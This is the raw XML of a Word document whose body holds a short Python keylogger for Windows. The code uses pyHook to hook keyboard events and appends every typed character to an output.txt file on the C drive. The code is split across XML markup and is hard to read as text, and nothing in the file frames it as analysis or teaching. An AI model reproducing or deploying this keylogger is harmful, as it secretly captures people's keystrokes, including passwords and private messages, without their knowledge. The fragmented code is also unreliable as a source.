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204D" w:rsidRDefault="00DC204D" w:rsidP="00DC2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import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win32api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DC204D" w:rsidRDefault="00DC204D" w:rsidP="00DC2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import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sys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC204D" w:rsidRDefault="00DC204D" w:rsidP="00DC2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import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6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>pythoncom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6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>pyHook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DC204D" w:rsidRDefault="00DC204D" w:rsidP="00DC2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buffer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''</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC204D" w:rsidRDefault="00DC204D" w:rsidP="00DC2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OnKeyboardEvent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event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):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC204D" w:rsidRDefault="00DC204D" w:rsidP="00DC2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event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.Ascii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5: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC204D" w:rsidRDefault="00DC204D" w:rsidP="00DC2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F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>sys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.exit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DC204D" w:rsidRDefault="00DC204D" w:rsidP="00DC2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event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.Ascii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!= 0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8: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC204D" w:rsidRDefault="00DC204D" w:rsidP="00DC2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f = open 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'c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:\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\output.txt'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'a'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</w:p>
    <w:p w:rsidR="00DC204D" w:rsidRDefault="00DC204D" w:rsidP="00DC2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keylogs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chr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event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.Ascii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</w:p>
    <w:p w:rsidR="00DC204D" w:rsidRDefault="00DC204D" w:rsidP="00DC2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event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.Ascii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13: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC204D" w:rsidRDefault="00DC204D" w:rsidP="00DC2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keylogs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keylogs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'\n'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DC204D" w:rsidRDefault="00DC204D" w:rsidP="00DC2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f.write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keylogs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</w:p>
    <w:p w:rsidR="00DC204D" w:rsidRDefault="00DC204D" w:rsidP="00DC2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f.close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DC204D" w:rsidRDefault="00DC204D" w:rsidP="00DC2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True:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC204D" w:rsidRDefault="00DC204D" w:rsidP="00DC2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hm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pyHook.HookManager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 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC204D" w:rsidRDefault="00DC204D" w:rsidP="00DC2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hm.KeyDown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OnKeyboardEvent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DC204D" w:rsidRDefault="00DC204D" w:rsidP="00DC2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hm.HookKeyboard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DC204D" w:rsidRDefault="00DC204D" w:rsidP="00DC2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6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>pythoncom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.PumpMessages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  <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00DC204D" w:rsidRDefault="00DC204D" w:rsidP="00DC2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51424" w:rsidRPr="00DC204D" w:rsidRDefault="00451424" w:rsidP="00DC204D">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00451424" w:rsidRPr="00DC204D" w:rsidSect="003216DF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5CE3"/>
    <w:rsid w:val="0015022E"/>
    <w:rsid w:val="00451424"/>
    <w:rsid w:val="00476B40"/>
    <w:rsid w:val="00705CE3"/>
    <w:rsid w:val="00B9575B"/>
    <w:rsid w:val="00DC2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6F5C74-DDBA-4EC0-8D50-9A857219A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05CE3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896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74</Words>
  <Characters>428</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>3</Lines>
  <Paragraphs>1</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>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alona kutsyy</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>אלונה קוציי</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-11-22T17:24:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-11-22T17:36:00Z</dcterms:modified>
</cp:coreProperties>
</file>